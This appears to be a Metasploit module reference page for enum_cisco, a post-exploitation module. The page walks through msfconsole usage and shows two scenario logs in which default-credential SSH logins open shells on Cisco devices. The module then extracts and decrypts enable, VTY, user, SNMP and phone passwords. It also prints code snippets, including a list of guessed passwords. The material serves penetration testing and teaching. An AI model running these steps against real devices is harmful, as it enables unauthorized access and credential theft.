Cisco Gather Device General Information - Metasploit
This page contains detailed information about how to use the post/networking/gather/enum_cisco metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Cisco Gather Device General Information
Module: post/networking/gather/enum_cisco
Source code: modules/post/networking/gather/enum_cisco.rb
Disclosure date: -
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): Cisco
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module collects a Cisco IOS or NXOS device information and configuration.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
There are two ways to execute this post module.
From the Meterpreter prompt
The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:
meterpreter > run post/networking/gather/enum_cisco
From the msf prompt
The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.
msf > use post/networking/gather/enum_cisco
msf post(enum_cisco) > show options
... show and set options ...
msf post(enum_cisco) > set SESSION session-id
msf post(enum_cisco) > exploit
If you wish to run the post against all sessions from framework, here is how:
1 - Create the following resource script:
framework.sessions.each_pair do |sid, session|
run_single("use post/networking/gather/enum_cisco")
run_single("set SESSION #{sid}")
run_single("run")
end
2 - At the msf prompt, execute the above resource script:
msf > resource path-to-resource-script
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
This module has been tested on the following hardware/OS combinations.
- IOS
- Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
- UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
The Catalyst 2950 config can be found here
The UC520 config can be found here
This module will look for the following parameters which contain credentials:
- IOS
- enable
- snmp-server
- VTY
- WiFi
- VPN
- username
- PPP
- web admin
Verification Steps
- Start msfconsole
- Get a shell
- Do:
use post/networking/gather/enum_cisco - Do:
set session [id] - Do:
set verbose true - Do:
run
Scenarios
Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
resource (cisco.rb)> set username cisco
username => cisco
resource (cisco.rb)> set password cisco
password => cisco
resource (cisco.rb)> set rhosts 222.222.2.222
rhosts => 222.222.2.222
resource (cisco.rb)> run
[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
[*] Command shell session 1 opened (111.111.1.111:40721 -> 222.222.2.222:22) at 2019-07-20 16:29:05 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (cisco.rb)> use post/networking/gather/enum_cisco
resource (cisco.rb)> set session 1
session => 1
resource (cisco.rb)> set verbose true
verbose => true
resource (cisco.rb)> set enable enable
enable => enable
resource (cisco.rb)> run
[!] SESSION may not be compatible with this module.
[*] Getting version information
[*] Getting privilege level
[*] The device OS is IOS
[*] Session running in mode EXEC
[*] Privilege level 1
[+] version information stored in to loot, file:/root/.msf4/loot/20190720162921_default_222.222.2.222_cisco.ios.versio_081759.txt
[*] Gathering info from show ip interface brief
[+] Saving to /root/.msf4/loot/20190720162941_default_222.222.2.222_cisco.ios.interf_908844.txt
[*] Gathering info from show inventory
[+] Saving to /root/.msf4/loot/20190720162946_default_222.222.2.222_cisco.ios.hw_inv_152516.txt
[+] Obtained higher privilege level.
[*] Gathering info from show run
[*] Parsing running configuration for credentials and secrets...
[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0
[+] 222.222.2.222:22 Decrypted Enable Password: password
[+] 222.222.2.222:22 Username 'encrypted' with Decrypted Password: encrypted
[+] 222.222.2.222:22 Username 'admin' with Password: admin
[+] 222.222.2.222:22 Username 'cisco' with Password: cisco
[+] 222.222.2.222:22 Unencrypted VTY Password: password
[+] 222.222.2.222:22 Decrypted VTY Password: password
[+] Saving to /root/.msf4/loot/20190720163001_default_222.222.2.222_cisco.ios.run_co_537064.txt
[*] Gathering info from show cdp neigh
[+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt
[*] Post module execution completed
[*] Starting persistent handler(s)...
msf5 post(networking/gather/enum_cisco) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
222.222.2.222 222.222.2.222 22/tcp cisco cisco Password
222.222.2.222 222.222.2.222 22/tcp $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0 Nonreplayable hash md5
222.222.2.222 222.222.2.222 22/tcp password Password
222.222.2.222 222.222.2.222 22/tcp encrypted encrypted Password
222.222.2.222 222.222.2.222 22/tcp admin admin Password
UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2
[*] Processing cisco.rb for ERB directives.
resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
resource (cisco.rb)> set username cisco
username => cisco
resource (cisco.rb)> set password cisco
password => cisco
resource (cisco.rb)> set rhosts 222.222.2.222
rhosts => 222.222.2.222
resource (cisco.rb)> run
[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
[*] Command shell session 1 opened (111.111.1.111:41839 -> 222.222.2.222:22) at 2019-07-21 16:24:02 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (cisco.rb)> use post/networking/gather/enum_cisco
resource (cisco.rb)> set session 1
session => 1
resource (cisco.rb)> set verbose true
verbose => true
resource (cisco.rb)> set enable cisco
enable => cisco
resource (cisco.rb)> run
[!] SESSION may not be compatible with this module.
[*] Getting version information
[*] Getting privilege level
[*] The device OS is IOS
[*] Session running in mode EXEC
[*] Privilege level 1
[+] version information stored in to loot, file:/root/.msf4/loot/20190721162417_default_222.222.2.222_cisco.ios.versio_707957.txt
[*] Gathering info from show login
[+] Saving to /root/.msf4/loot/20190721162432_default_222.222.2.222_cisco.ios.login__534767.txt
[*] Gathering info from show ip interface brief
[+] Saving to /root/.msf4/loot/20190721162437_default_222.222.2.222_cisco.ios.interf_310865.txt
[*] Gathering info from show inventory
[+] Saving to /root/.msf4/loot/20190721162443_default_222.222.2.222_cisco.ios.hw_inv_238952.txt
[+] Obtained higher privilege level.
[*] Gathering info from show run
[*] Parsing running configuration for credentials and secrets...
[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 222.222.2.222:22 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 222.222.2.222:22 SNMP Community (RO): public
[+] 222.222.2.222:22 SNMP Community (RW): private
[+] 222.222.2.222:22 Website Username: cisco, of type: system, Password Hash: $1$n/n0$q6wNrBypu0GDpxzfSwGnf1
[+] 222.222.2.222:22 ePhone Username 'phoneone' with Password: 111111
[+] 222.222.2.222:22 ePhone Username 'phonetwo' with Password: 222222
[+] 222.222.2.222:22 ePhone Username 'phonethree' with Password: 333333
[+] 222.222.2.222:22 ePhone Username 'phonefour' with Password: 444444
[+] Saving to /root/.msf4/loot/20190721162458_default_222.222.2.222_cisco.ios.run_co_918487.txt
[*] Gathering info from show cdp neigh
[+] Saving to /root/.msf4/loot/20190721162503_default_222.222.2.222_cisco.ios.cdp_ne_135156.txt
[*] Gathering info from show lldp neigh
[+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt
[*] Post module execution completed
[*] Starting persistent handler(s)...
msf5 post(networking/gather/enum_cisco) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
222.222.2.222 222.222.2.222 22/tcp cisco $1$n/n0$q6wNrBypu0GDpxzfSwGnf1 Nonreplayable hash md5
222.222.2.222 222.222.2.222 22/tcp cisco $1$DaqN$iP32E5WcOOui/H66R63QB0 Nonreplayable hash md5
222.222.2.222 222.222.2.222 22/tcp cisco cisco Password
222.222.2.222 222.222.2.222 22/tcp phoneone 111111 Password
222.222.2.222 222.222.2.222 22/tcp phonetwo 222222 Password
222.222.2.222 222.222.2.222 22/tcp phonethree 333333 Password
222.222.2.222 222.222.2.222 22/tcp phonefour 444444 Password
222.222.2.222 222.222.2.222 161/udp private Password
222.222.2.222 222.222.2.222 161/udp public Password
222.222.2.222 222.222.2.222 22/tcp $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1 Nonreplayable hash md5
Go back to menu.
Msfconsole Usage
Here is how the networking/gather/enum_cisco post exploitation module looks in the msfconsole:
msf6 > use post/networking/gather/enum_cisco
msf6 post(networking/gather/enum_cisco) > show info
Name: Cisco Gather Device General Information
Module: post/networking/gather/enum_cisco
Platform: Cisco
Arch:
Rank: Normal
Provided by:
Carlos Perez <[email protected]>
Compatible session types:
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE no Enable password for changing privilege level.
SESSION yes The session to run this module on.
WORDLIST no Wordlist of possible enable passwords to try.
Description:
This module collects a Cisco IOS or NXOS device information and
configuration.
Module Options
This is a complete list of options available in the networking/gather/enum_cisco post exploitation module:
msf6 post(networking/gather/enum_cisco) > show options
Module options (post/networking/gather/enum_cisco):
Name Current Setting Required Description
---- --------------- -------- -----------
ENABLE no Enable password for changing privilege level.
SESSION yes The session to run this module on.
WORDLIST no Wordlist of possible enable passwords to try.
Advanced Options
Here is a complete list of advanced options supported by the networking/gather/enum_cisco post exploitation module:
msf6 post(networking/gather/enum_cisco) > show advanced
Module advanced options (post/networking/gather/enum_cisco):
Name Current Setting Required Description
---- --------------- -------- -----------
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Post Actions
This is a list of all post exploitation actions which the networking/gather/enum_cisco module can do:
msf6 post(networking/gather/enum_cisco) > show actions
Post actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the networking/gather/enum_cisco post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 post(networking/gather/enum_cisco) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to change privilege level using provided Enable password.
Here is a relevant code snippet related to the "Failed to change privilege level using provided Enable password." error message:
106: if enable_pass
107: found = false
108: session.shell_command('enable').to_s.strip
109: en_out = session.shell_command(enable_pass)
110: if en_out =~ /Password:/
111: print_error('Failed to change privilege level using provided Enable password.')
112: else
113: found = true
114: end
115: else
116: if pass_file
Wordlist File <PASS_FILE> does not exist!
Here is a relevant code snippet related to the "Wordlist File <PASS_FILE> does not exist!" error message:
113: found = true
114: end
115: else
116: if pass_file
117: if !::File.exist?(pass_file)
118: print_error("Wordlist File #{pass_file} does not exist!")
119: return
120: end
121: creds = ::File.open(pass_file, 'rb')
122: else
123: creds = "Cisco\n" << "cisco\n" << "sanfran\n" << "SanFran\n" << "password\n" << "Password\n"
Could not obtain higher privilege level.
Here is a relevant code snippet related to the "Could not obtain higher privilege level." error message:
144: end
145: if found
146: print_good('Obtained higher privilege level.')
147: return true
148: else
149: print_error('Could not obtain higher privilege level.')
150: return false
151: end
152: end
153:
154: # Run enumeration commands for when privilege level is 7 or 15
Go back to menu.
Related Pull Requests
- #15192 Merged Pull Request: Enforce Style/RedundantBegin for new modules
- #14734 Merged Pull Request: Rubocop recently landed modules
- #14202 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/core
- #13870 Merged Pull Request: Arista processor
- #13750 Merged Pull Request: Centralize networking
Go back to menu.
See Also
Check also the following modules related to this module:
- post/networking/gather/enum_brocade
- post/networking/gather/enum_f5
- post/networking/gather/enum_juniper
- post/networking/gather/enum_mikrotik
- post/networking/gather/enum_vyos
Authors
- Carlos Perez <carlos_perez[at]darkoperator.com>
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
